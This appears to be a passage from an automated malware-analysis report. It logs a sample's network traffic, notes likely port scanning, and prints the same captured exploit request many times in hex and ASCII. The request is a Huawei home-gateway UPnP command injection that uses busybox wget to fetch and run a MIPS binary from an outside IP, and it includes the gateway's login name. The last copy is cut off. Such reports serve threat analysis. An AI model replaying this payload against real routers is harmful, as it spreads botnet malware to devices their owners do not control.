Source: unknown	Network traffic detected: HTTP traffic on port 40610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51404 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40700 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43876 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41664 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55482 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36076 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40700 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36076 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33232 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36076 -> 52869

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic

TCP traffic: 45.197.146.211 ports 2,5,6,8,9,52869

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 